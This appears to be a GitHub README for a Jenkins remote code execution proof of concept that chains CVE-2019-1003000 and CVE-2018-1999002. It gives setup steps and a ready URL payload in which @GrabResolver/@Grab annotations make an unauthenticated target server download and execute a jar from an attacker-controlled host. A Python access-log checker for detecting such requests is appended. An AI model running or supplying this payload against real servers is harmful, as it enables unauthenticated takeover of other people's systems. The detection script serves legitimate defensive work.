😈 Jenkins RCE PoC. From unauthenticated user to remote code execution - it's a hacker's dream! (Chaining CVE-2019-1003000, CVE-2018-1999002, and more)
Latest commit 83555c0 Feb 21, 2019
Repository contents (name, latest commit message, commit time):
code - Initial commit - Feb 19, 2019
www/package/payload/1 - Initial commit - Feb 19, 2019
README.txt - fixed EXPLOIT HOST - Feb 21, 2019



Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (

Read his write-ups on this exploit here -
Part 1:
Part 2:
His github:

- Edit code/ to your specifications, then run to generate a jar and copy it to the web folder.
- Once that is finished, copy the inner contents of www/ to a webserver.
- In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> with the hostname of the server where you uploaded your files.

URL Payload:
http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
@GrabResolver(name='payload', root='http://<EXPLOIT HOST>')%0a
@Grab(group='package', module='payload', version='1')%0a
import Payload;
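
For defenders, a log check for the request shape shown above, as an added example that is not part of the original README: it flags access-log lines that reach the checkScriptCompile endpoint and pulls any @Grab/@GrabResolver annotations and resolver roots out of the (possibly double-encoded) request target. The combined log format, the sample lines, the addresses, `repo.example` and the `PARAM` query name are constructed assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Endpoint path as it appears in the URL payload on this page.
ENDPOINT = ("/descriptorByName/org.jenkinsci.plugins.workflow.cps."
            "CpsFlowDefinition/checkScriptCompile")
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
GRAB_RE = re.compile(r"@(Grab\w*)\s*\(")
ROOT_RE = re.compile(r"@GrabResolver\s*\([^)]*root\s*=\s*['\"]([^'\"]+)['\"]")

def decode(text, rounds=3):
    """URL-decode repeatedly so double-encoded annotations are still seen."""
    for _ in range(rounds):
        nxt = unquote(text)
        if nxt == text:
            break
        text = nxt
    return text

def inspect_line(line):
    """Return a finding for one access-log line, or None if not relevant."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    src, method, target, status = m.groups()
    path = decode(urlsplit(target).path)
    if ENDPOINT not in path:
        return None
    decoded = decode(target)
    annotations = sorted(set(GRAB_RE.findall(decoded)))
    return {
        "source": src, "method": method, "status": int(status),
        "via_security_realm": "/securityRealm/user/" in path,
        "annotations": annotations,
        "resolver_roots": ROOT_RE.findall(decoded),  # hosts to block and hunt for
        "severity": "high" if annotations else "review",
    }

# Constructed sample log (documentation addresses; PARAM is a placeholder name).
def _line(src, target, status=200):
    return f'{src} - - [21/Feb/2019:10:00:00 +0000] "GET {target} HTTP/1.1" {status} 0'

EP = "/securityRealm/user/admin" + ENDPOINT
Q = ("?PARAM=%40GrabResolver(name%3D'payload'%2C%20root%3D'http%3A%2F%2Frepo.example')"
     "%0a%40Grab(group%3D'package'%2C%20module%3D'payload'%2C%20version%3D'1')")
SAMPLE_LOG = [_line("198.51.100.7", EP + Q), _line("198.51.100.7", EP + Q.replace("%", "%25")),
              _line("192.0.2.10", EP, 403), _line("192.0.2.10", "/job/build/")]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect_line(entry))
```

Access logs normally omit POST bodies, so a hit on the endpoint with no visible annotations is reported as "review" rather than dismissed.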